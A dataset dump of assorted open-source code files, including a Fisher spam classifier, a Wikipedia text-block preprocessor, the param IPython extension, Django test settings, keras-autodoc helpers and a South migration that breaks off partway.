Dataset schema: repo_name (string, 5–92 chars), path (string, 4–221 chars), copies (string, 19 classes), size (string, 4–6 chars), content (string, 766–896k chars), license (string, 15 classes), hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B), line_mean (float64, 6.51–99.9), line_max (int64, 32–997), alpha_frac (float64, 0.25–0.96), autogenerated (bool, 1 class), ratio (float64, 1.5–13.6), config_test (bool, 2 classes), has_no_keywords (bool, 2 classes), few_assignments (bool, 1 class).

| repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated | ratio | config_test | has_no_keywords | few_assignments |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
piyushkant/Spam-Filter-Machine-Learning
|
spamfilter/fisher.py
|
1
|
2184
|
#####################################################
# Copyright (c) 2012 Piyush Kant #
# See the file license.txt for copying permission #
#####################################################
import classifier
import math
class fisherclassifier(classifier.classifier):
def __init__(self, getFeatures):
classifier.classifier.__init__(self, getFeatures)
self.minimum = {}
#Pr(category|feature)
def cProb(self, feat, cat):
# The frequency of this feature in this category
fp = self.featProb(feat, cat)
if fp == 0:
return 0
# The frequency of this feature in all the categories
freqSum = sum([self.featProb(feat, c) for c in self.catList()])
# The probability is the frequency in this category divided by the overall frequency
p = fp / freqSum
return p
def fisherProb(self, item, cat):
# Multiply all the probabilities together
p = 1
features = self.getFeatures(item)
for feat in features:
p *= (self.weightedProb(feat, cat, self.cProb))
# Take the natural log and multiply by -2
fscore = -2 * math.log(p)
# Use the inverse chi2 function to get a probability
return self.invchi2(fscore, len(features) * 2)
def invchi2(self, chi, df):
m = chi / 2.0
sum = term = math.exp(-m)
for i in range(1, df // 2):
term *= m / i
sum += term
return min(sum, 1.0)
def setMinimum(self, cat, min):
self.minimum[cat] = min
def getMinimum(self, cat):
if cat not in self.minimum:
return 0
return self.minimum[cat]
def classify(self, item, default=None):
# Loop through looking for the best result
best = default
max = 0.0
for c in self.catList():
p = self.fisherProb(item, c)
# Make sure it exceeds its minimum
if p > self.getMinimum(c) and p > max:
best = c
max = p
return best
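# --- Illustrative sketch (not part of the original module) ---
# Fisher's method combines the per-feature probabilities by taking
# -2 * ln(p1 * p2 * ... * pn) and comparing that score against a chi-squared
# distribution with 2*n degrees of freedom; invchi2 above is the upper-tail
# probability used for that comparison. A self-contained check with made-up
# probabilities (no classifier instance or training data required):
def _fisher_demo():
    probs = [0.2, 0.3, 0.9]   # hypothetical Pr(category|feature) values
    product = 1.0
    for p in probs:
        product *= p
    fscore = -2 * math.log(product)
    df = len(probs) * 2
    # Same series expansion used by fisherclassifier.invchi2 (even df only).
    m = fscore / 2.0
    total = term = math.exp(-m)
    for i in range(1, df // 2):
        term *= m / i
        total += term
    print(min(total, 1.0))    # combined probability in [0, 1]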
|
mit
| -6,822,964,227,045,991,000
| 28.931507
| 92
| 0.514652
| false
| 4.324752
| false
| false
| false
|
google-research/language
|
language/orqa/preprocessing/wiki_preprocessor.py
|
1
|
3798
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Preprocessor class that extract creates a database of text blocks.
Each input line should have the following JSON format:
```
{
"title": "Document Tile",
"text": "This is a full document."
}
```
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import re
import six
import tensorflow.compat.v1 as tf
def add_int64_feature(key, values, example):
example.features.feature[key].int64_list.value.extend(values)
class Preprocessor(object):
"""Preprocessor."""
def __init__(self, sentence_splitter, max_block_length, tokenizer):
self._tokenizer = tokenizer
self._sentence_splitter = sentence_splitter
self._max_block_length = max_block_length
tf.logging.info("Max block length {}".format(self._max_block_length))
def generate_sentences(self, title, text):
"""Generate sentences in each block from text."""
title_length = len(self._tokenizer.tokenize(title))
current_token_count = 0
current_block_sentences = []
for sentence in self._sentence_splitter.tokenize(text):
num_tokens = len(self._tokenizer.tokenize(sentence))
# Hypothetical sequence [CLS] <title> [SEP] <current> <next> [SEP].
hypothetical_length = 3 + title_length + current_token_count + num_tokens
if hypothetical_length <= self._max_block_length:
current_token_count += num_tokens
current_block_sentences.append(sentence)
else:
yield current_block_sentences
current_token_count = num_tokens
current_block_sentences = []
current_block_sentences.append(sentence)
if current_block_sentences:
yield current_block_sentences
def create_example(self, title, sentences):
"""Create example."""
title_tokens = self._tokenizer.tokenize(title)
title_ids = self._tokenizer.convert_tokens_to_ids(title_tokens)
token_ids = []
sentence_starts = []
for sentence in sentences:
sentence_starts.append(len(token_ids))
sentence_tokens = self._tokenizer.tokenize(sentence)
token_ids.extend(self._tokenizer.convert_tokens_to_ids(sentence_tokens))
example = tf.train.Example()
add_int64_feature("title_ids", title_ids, example)
add_int64_feature("token_ids", token_ids, example)
add_int64_feature("sentence_starts", sentence_starts, example)
return example.SerializeToString()
def generate_block_info(self, title, text):
for sentences in self.generate_sentences(title, text):
if sentences:
block = " ".join(sentences)
example = self.create_example(title, sentences)
yield title, block, example
def remove_doc(title):
return re.match(r"(List of .+)|"
r"(Index of .+)|"
r"(Outline of .+)|"
r"(.*\(disambiguation\).*)", title)
def example_from_json_line(line, html_parser, preprocessor):
if not isinstance(line, six.text_type):
line = line.decode("utf-8")
data = json.loads(line)
title = data["title"]
if not remove_doc(title):
text = html_parser.unescape(data["text"])
for info in preprocessor.generate_block_info(title, text):
yield info
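# --- Illustrative sketch (not part of the original file) ---
# generate_sentences greedily packs sentences into blocks so that the
# hypothetical sequence [CLS] <title> [SEP] <block> [SEP] stays within
# max_block_length tokens. The toy splitter and tokenizer below only
# approximate the real sentence splitter and BERT tokenizer used by the
# pipeline. (Preprocessor.__init__ logs via tf.logging, so the TF1-compat
# import at the top of this file must succeed for this demo to run.)
class _ToySentenceSplitter(object):

  def tokenize(self, text):
    return [s.strip() + "." for s in text.split(".") if s.strip()]


class _ToyTokenizer(object):

  def tokenize(self, text):
    return text.split()

  def convert_tokens_to_ids(self, tokens):
    return [hash(token) % 1000 for token in tokens]


def _blocking_demo():
  preprocessor = Preprocessor(_ToySentenceSplitter(), 12, _ToyTokenizer())
  text = "First sentence here. Second sentence is a bit longer. Third one."
  for block in preprocessor.generate_sentences("Toy Title", text):
    print(block)  # each printed list of sentences fits the 12-token budget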
|
apache-2.0
| -1,051,289,272,584,799,600
| 34.495327
| 79
| 0.688784
| false
| 3.824773
| false
| false
| false
|
JuBra/GEMEditor
|
GEMEditor/rw/test/test_units_rw.py
|
1
|
1230
|
from GEMEditor.rw.units import add_unit_definitions
from lxml.etree import Element
from GEMEditor.rw import *
class TestAddUnitsDefinition:
def test_node_addition(self):
root = Element("root")
add_unit_definitions(root)
list_of_unitdefinitions_node = root.find(sbml3_listOfUnitDefinitions)
assert list_of_unitdefinitions_node is not None
assert len(list_of_unitdefinitions_node) == 1
unit_definition_node = list_of_unitdefinitions_node.find(sbml3_unitDefinition)
assert unit_definition_node is not None
assert unit_definition_node.get("id") == "mmol_per_gDW_per_hr"
list_of_units_node = unit_definition_node.find(sbml3_listOfUnits)
assert list_of_units_node is not None
assert len(list_of_units_node) == 3
expected_values = set([("1", "mole", "1", "-3"),
("-1", "gram", "1", "0"),
("-1", "second", "3600", "0")])
found_set = set()
for child in list_of_units_node.iterfind(sbml3_unit):
found_set.add((child.get("exponent"), child.get("kind"), child.get("multiplier"), child.get("scale")))
assert expected_values == found_set
|
gpl-3.0
| 2,451,616,240,589,040,000
| 37.46875
| 114
| 0.615447
| false
| 3.617647
| false
| false
| false
|
ceball/param
|
param/ipython.py
|
1
|
12580
|
"""
Optional IPython extension for working with Parameters.
This extension offers extended but completely optional functionality
for IPython users. From within IPython, it may be loaded using:
%load_ext param.ipython
This will register the %params line magic to allow easy inspection of
all the parameters defined on a parameterized class or object:
%params <parameterized class or object>
All parameters of the class or object will be listed in the IPython
pager together with all their corresponding attributes and
docstrings. Note that the class or object to be inspected must already
exist in the active namespace.
"""
__author__ = "Jean-Luc Stevens"
import re
import textwrap
import param
# Whether to generate warnings when misformatted docstrings are found
WARN_MISFORMATTED_DOCSTRINGS = False
# ANSI color codes for the IPython pager
red = '\x1b[1;31m%s\x1b[0m'
blue = '\x1b[1;34m%s\x1b[0m'
green = '\x1b[1;32m%s\x1b[0m'
cyan = '\x1b[1;36m%s\x1b[0m'
class ParamPager(object):
"""
Callable class that displays information about the supplied
Parameterized object or class in the IPython pager.
"""
def __init__(self, metaclass=False):
"""
If metaclass is set to True, the checks for Parameterized
classes and objects are disabled. This option is for use in
ParameterizedMetaclass for automatic docstring generation.
"""
# Order of the information to be listed in the table (left to right)
self.order = ['name', 'changed', 'value', 'type', 'bounds', 'mode']
self.metaclass = metaclass
def get_param_info(self, obj, include_super=True):
"""
Get the parameter dictionary, the list of modified parameters
and the dictionary of parameter values. If include_super is
True, parameters are also collected from the super classes.
"""
params = dict(obj.param.objects('existing'))
if isinstance(obj,type):
changed = []
val_dict = dict((k,p.default) for (k,p) in params.items())
self_class = obj
else:
changed = [name for (name,_) in obj.param.get_param_values(onlychanged=True)]
val_dict = dict(obj.param.get_param_values())
self_class = obj.__class__
if not include_super:
params = dict((k,v) for (k,v) in params.items()
if k in self_class.__dict__)
params.pop('name') # Already displayed in the title.
return (params, val_dict, changed)
def param_docstrings(self, info, max_col_len=100, only_changed=False):
"""
Build a string that presents all of the parameter
docstrings in a clean format (alternating red and blue for
readability).
"""
(params, val_dict, changed) = info
contents = []
displayed_params = {}
for name, p in params.items():
if only_changed and not (name in changed):
continue
displayed_params[name] = p
right_shift = max(len(name) for name in displayed_params.keys())+2
for i, name in enumerate(sorted(displayed_params)):
p = displayed_params[name]
heading = "%s: " % name
unindented = textwrap.dedent("< No docstring available >" if p.doc is None else p.doc)
if (WARN_MISFORMATTED_DOCSTRINGS
and not unindented.startswith("\n") and len(unindented.splitlines()) > 1):
param.main.warning("Multi-line docstring for %r is incorrectly formatted "
" (should start with newline)", name)
# Strip any starting newlines
while unindented.startswith("\n"):
unindented = unindented[1:]
lines = unindented.splitlines()
if len(lines) > 1:
tail = ['%s%s' % (' ' * right_shift, line) for line in lines[1:]]
all_lines = [ heading.ljust(right_shift) + lines[0]] + tail
elif len(lines) == 1:
all_lines = [ heading.ljust(right_shift) + lines[0]]
else:
all_lines = []
if i % 2: # Alternate red and blue for docstrings
contents.extend([red %el for el in all_lines])
else:
contents.extend([blue %el for el in all_lines])
return "\n".join(contents)
def _build_table(self, info, order, max_col_len=40, only_changed=False):
"""
Collect the information about parameters needed to build a
properly formatted table and then tabulate it.
"""
info_dict, bounds_dict = {}, {}
(params, val_dict, changed) = info
col_widths = dict((k,0) for k in order)
for name, p in params.items():
if only_changed and not (name in changed):
continue
constant = 'C' if p.constant else 'V'
readonly = 'RO' if p.readonly else 'RW'
allow_None = ' AN' if hasattr(p, 'allow_None') and p.allow_None else ''
mode = '%s %s%s' % (constant, readonly, allow_None)
info_dict[name] = {'name': name, 'type':p.__class__.__name__,
'mode':mode}
if hasattr(p, 'bounds'):
lbound, ubound = (None,None) if p.bounds is None else p.bounds
mark_lbound, mark_ubound = False, False
# Use soft_bounds when bounds not defined.
if hasattr(p, 'get_soft_bounds'):
soft_lbound, soft_ubound = p.get_soft_bounds()
if lbound is None and soft_lbound is not None:
lbound = soft_lbound
mark_lbound = True
if ubound is None and soft_ubound is not None:
ubound = soft_ubound
mark_ubound = True
if (lbound, ubound) != (None,None):
bounds_dict[name] = (mark_lbound, mark_ubound)
info_dict[name]['bounds'] = '(%s, %s)' % (lbound, ubound)
value = repr(val_dict[name])
if len(value) > (max_col_len - 3):
value = value[:max_col_len-3] + '...'
info_dict[name]['value'] = value
for col in info_dict[name]:
max_width = max([col_widths[col], len(info_dict[name][col])])
col_widths[col] = max_width
return self._tabulate(info_dict, col_widths, changed, order, bounds_dict)
def _tabulate(self, info_dict, col_widths, changed, order, bounds_dict):
"""
Returns the supplied information as a table suitable for
printing or paging.
info_dict: Dictionary of the parameters name, type and mode.
col_widths: Dictionary of column widths in characters
changed: List of parameters modified from their defaults.
order: The order of the table columns
bound_dict: Dictionary of appropriately formatted bounds
"""
contents, tail = [], []
column_set = set(k for row in info_dict.values() for k in row)
columns = [col for col in order if col in column_set]
title_row = []
# Generate the column headings
for i, col in enumerate(columns):
width = col_widths[col]+2
col = col.capitalize()
formatted = col.ljust(width) if i == 0 else col.center(width)
title_row.append(formatted)
contents.append(blue % ''.join(title_row)+"\n")
# Format the table rows
for row in sorted(info_dict):
row_list = []
info = info_dict[row]
for i,col in enumerate(columns):
width = col_widths[col]+2
val = info[col] if (col in info) else ''
formatted = val.ljust(width) if i==0 else val.center(width)
if col == 'bounds' and bounds_dict.get(row,False):
(mark_lbound, mark_ubound) = bounds_dict[row]
lval, uval = formatted.rsplit(',')
lspace, lstr = lval.rsplit('(')
ustr, uspace = uval.rsplit(')')
lbound = lspace + '('+(cyan % lstr) if mark_lbound else lval
ubound = (cyan % ustr)+')'+uspace if mark_ubound else uval
formatted = "%s,%s" % (lbound, ubound)
row_list.append(formatted)
row_text = ''.join(row_list)
if row in changed:
row_text = red % row_text
contents.append(row_text)
return '\n'.join(contents+tail)
def __call__(self, param_obj):
"""
Given a Parameterized object or class, display information
about the parameters in the IPython pager.
"""
title = None
if not self.metaclass:
parameterized_object = isinstance(param_obj, param.Parameterized)
parameterized_class = (isinstance(param_obj,type)
and issubclass(param_obj,param.Parameterized))
if not (parameterized_object or parameterized_class):
print("Object is not a Parameterized class or object.")
return
if parameterized_object:
# Only show the name if not autogenerated
class_name = param_obj.__class__.__name__
default_name = re.match('^'+class_name+'[0-9]+$', param_obj.name)
obj_name = '' if default_name else (' %r' % param_obj.name)
title = 'Parameters of %r instance%s' % (class_name, obj_name)
if title is None:
title = 'Parameters of %r' % param_obj.name
heading_line = '=' * len(title)
heading_text = "%s\n%s\n" % (title, heading_line)
param_info = self.get_param_info(param_obj, include_super=True)
if not param_info[0]:
return "%s\n%s" % ((green % heading_text), "Object has no parameters.")
table = self._build_table(param_info, self.order, max_col_len=40,
only_changed=False)
docstrings = self.param_docstrings(param_info, max_col_len=100, only_changed=False)
dflt_msg = "Parameters changed from their default values are marked in red."
top_heading = (green % heading_text)
top_heading += "\n%s" % (red % dflt_msg)
top_heading += "\n%s" % (cyan % "Soft bound values are marked in cyan.")
top_heading += '\nC/V= Constant/Variable, RO/RW = ReadOnly/ReadWrite, AN=Allow None'
heading_text = 'Parameter docstrings:'
heading_string = "%s\n%s" % (heading_text, '=' * len(heading_text))
docstring_heading = (green % heading_string)
return "%s\n\n%s\n\n%s\n\n%s" % (top_heading, table, docstring_heading, docstrings)
message = """Welcome to the param IPython extension! (https://param.holoviz.org/)"""
message += '\nAvailable magics: %params'
_loaded = False
def load_ipython_extension(ip, verbose=True):
from IPython.core.magic import Magics, magics_class, line_magic
from IPython.core import page
@magics_class
class ParamMagics(Magics):
"""
Implements the %params line magic used to inspect the parameters
of a parameterized class or object.
"""
def __init__(self, *args, **kwargs):
super(ParamMagics, self).__init__(*args, **kwargs)
self.param_pager = ParamPager()
@line_magic
def params(self, parameter_s='', namespaces=None):
"""
The %params line magic accepts a single argument which is a
handle on the parameterized object to be inspected. If the
object can be found in the active namespace, information about
the object's parameters is displayed in the IPython pager.
Usage: %params <parameterized class or object>
"""
if parameter_s=='':
print("Please specify an object to inspect.")
return
# Beware! Uses IPython internals that may change in future...
obj = self.shell._object_find(parameter_s)
if obj.found is False:
print("Object %r not found in the namespace." % parameter_s)
return
page.page(self.param_pager(obj.obj))
if verbose: print(message)
global _loaded
if not _loaded:
_loaded = True
ip.register_magics(ParamMagics)
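# --- Illustrative sketch (not part of the original module) ---
# Outside IPython, ParamPager can be called directly on a Parameterized class
# to obtain the same text that the %params magic would send to the pager.
# The class and parameter names below are made up for demonstration only.
def _param_pager_demo():
    class Gaussian(param.Parameterized):
        mean = param.Number(default=0.0, doc="Mean of the distribution.")
        sigma = param.Number(default=1.0, bounds=(0, None),
                             doc="Standard deviation; must be non-negative.")

    print(ParamPager()(Gaussian))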
|
bsd-3-clause
| -6,385,748,612,119,651,000
| 36.891566
| 98
| 0.570032
| false
| 4.084416
| false
| false
| false
|
nimbis/cmsplugin-forms-builder
|
tests/settings.py
|
1
|
5042
|
DEBUG = True
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
'TEST_NAME': ':memory:',
},
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = '6e-b#&0y4mbwu=)hx7a899p(k+i48(p)@e@^aal8^$pn1xqk$$'
MIDDLEWARE = [
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'tests.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'cmsplugin_forms_builder.wsgi.application'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'OPTIONS': {
'debug': DEBUG,
'context_processors': [
'django.core.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
],
},
},
]
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'menus',
'treebeard',
'cms',
'forms_builder.forms',
'cmsplugin_forms_builder',
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
|
bsd-3-clause
| 4,226,599,500,157,421,000
| 30.710692
| 79
| 0.672154
| false
| 3.710081
| false
| false
| false
|
Ikusaba-san/Chiaki-Nanami
|
cogs/utils/formats.py
|
1
|
1363
|
import functools
import re
from more_itertools import one
def pluralize(**thing):
name, value = one(thing.items())
if name.endswith('y') and name[-2] not in 'aeiou':
name = f'{name[:-1]}ies' if value != 1 else name
return f'{value} {name}'
return f'{value} {name}{"s" * (value != 1)}'
def human_join(iterable, delim=', ', *, final='and'):
"""Joins an iterable in a human-readable way.
The items are joined such that the last two items will be joined with a
different delimiter than the rest.
"""
seq = tuple(iterable)
if not seq:
return ''
return f"{delim.join(seq[:-1])} {final} {seq[-1]}" if len(seq) != 1 else seq[0]
def multi_replace(string, replacements):
substrs = sorted(replacements, key=len, reverse=True)
pattern = re.compile("|".join(map(re.escape, substrs)))
return pattern.sub(lambda m: replacements[m.group(0)], string)
_markdown_replacements = {c: f'\\{c}' for c in ('*', '`', '_', '~', '\\')}
escape_markdown = functools.partial(multi_replace, replacements=_markdown_replacements)
del _markdown_replacements
def truncate(s, length, placeholder):
return (s[:length] + placeholder) if len(s) > length + len(placeholder) else s
def bold_name(thing, predicate):
name = str(thing)
return f'**{escape_markdown(name)}**' if predicate(thing) else name
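# --- Illustrative sketch (not part of the original module) ---
# Quick demonstration of the helpers above, with the expected output of each
# call shown as an inline comment:
if __name__ == '__main__':
    print(pluralize(apple=1))                    # 1 apple
    print(pluralize(berry=3))                    # 3 berries
    print(human_join(['red', 'green', 'blue']))  # red, green and blue
    print(escape_markdown('a*b_c'))              # a\*b\_c
    print(truncate('hello world', 5, '...'))     # hello...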
|
mit
| -345,050,366,121,900,900
| 29.288889
| 87
| 0.641966
| false
| 3.433249
| false
| false
| false
|
keras-team/keras-autodoc
|
keras_autodoc/gathering_members.py
|
1
|
4181
|
import inspect
from inspect import isclass, isfunction, isroutine
from typing import List
from .utils import import_object
def get_classes(module,
exclude: List[str] = None,
return_strings: bool = True):
"""Get all the classes of a module.
# Arguments
module: The module to fetch the classes from. If it's a
string, it should be in the dotted format. `'keras.layers'` for example.
exclude: The names which will be excluded from the returned list. For
example, `get_classes('keras.layers', exclude=['Dense', 'Conv2D'])`.
return_strings: If False, the actual classes will be returned. Note that
if you use aliases when building your docs, you should use strings.
This is because the computed signature uses
`__name__` and `__module__` if you don't provide a string as input.
# Returns
A list of strings or a list of classes.
"""
return _get_all_module_element(module, exclude, return_strings, True)
def get_functions(module,
exclude: List[str] = None,
return_strings: bool = True):
"""Get all the functions of a module.
# Arguments
module: The module to fetch the functions from. If it's a
string, it should be in the dotted format. `'keras.backend'` for example.
exclude: The names which will be excluded from the returned list. For
example, `get_functions('keras.backend', exclude=['max'])`.
return_strings: If False, the actual functions will be returned. Note that
if you use aliases when building your docs, you should use strings.
This is because the computed signature uses
`__name__` and `__module__` if you don't provide a string as input.
# Returns
A list of strings or a list of functions.
"""
return _get_all_module_element(module, exclude, return_strings, False)
def get_methods(cls, exclude=None, return_strings=True):
"""Get all the method of a class.
# Arguments
cls: The class to fetch the methods from. If it's a
string, it should be in the dotted format. `'keras.layers.Dense'`
for example.
exclude: The names which will be excluded from the returned list. For
example, `get_methods('keras.Model', exclude=['save'])`.
return_strings: If False, the actual methods will be returned. Note that
if you use aliases when building your docs, you should use strings.
This is because the computed signature uses
`__name__` and `__module__` if you don't provide a string as input.
# Returns
A list of strings or a list of methods.
"""
if isinstance(cls, str):
cls_str = cls
cls = import_object(cls)
else:
cls_str = f'{cls.__module__}.{cls.__name__}'
exclude = exclude or []
methods = []
for _, method in inspect.getmembers(cls, predicate=isroutine):
if method.__name__[0] == "_" or method.__name__ in exclude:
continue
if return_strings:
methods.append(f'{cls_str}.{method.__name__}')
else:
methods.append(method)
return methods
def _get_all_module_element(module, exclude, return_strings, class_):
if isinstance(module, str):
module = import_object(module)
exclude = exclude or []
module_data = []
for name in dir(module):
module_member = getattr(module, name)
if not (isfunction(module_member) or isclass(module_member)):
continue
if name[0] == "_" or name in exclude:
continue
if module.__name__ not in module_member.__module__:
continue
if module_member in module_data:
continue
if class_ and not isclass(module_member):
continue
if not class_ and not isfunction(module_member):
continue
if return_strings:
module_data.append(f'{module.__name__}.{name}')
else:
module_data.append(module_member)
module_data.sort(key=id)
return module_data
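# --- Illustrative sketch (not part of the original module) ---
# The gathering helpers also accept plain module/class objects instead of
# dotted strings, which sidesteps import_object entirely. For example,
# collecting the public functions and classes of the standard-library json
# module (result order follows the module's own sort key and may vary):
def _gathering_demo():
    import json
    print(get_functions(json))
    # e.g. ['json.dump', 'json.dumps', 'json.load', 'json.loads', ...]
    print(get_classes(json, exclude=['JSONDecodeError']))
    # e.g. ['json.JSONDecoder', 'json.JSONEncoder']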
|
apache-2.0
| -592,158,582,117,040,500
| 36
| 85
| 0.610859
| false
| 4.35975
| false
| false
| false
|
ParsonsAMT/Myne
|
datamining/apps/profiles/migrations/0006_auto__add_courseimage.py
|
1
|
20722
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'CourseImage'
db.create_table('profiles_courseimage', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('created_at', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('updated_at', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('created_by', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], blank=True)),
('url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('image', self.gf('django.db.models.fields.files.ImageField')(max_length=100)),
('course', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['profiles.Course'])),
('title', self.gf('django.db.models.fields.CharField')(max_length=255)),
('author', self.gf('django.db.models.fields.CharField')(max_length=255)),
))
db.send_create_signal('profiles', ['CourseImage'])
def backwards(self, orm):
# Deleting model 'CourseImage'
db.delete_table('profiles_courseimage')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'profiles.course': {
'Meta': {'object_name': 'Course'},
'attributes': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'coursenumber': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'credits': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'format': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'learning_outcomes': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'levels': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'method': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
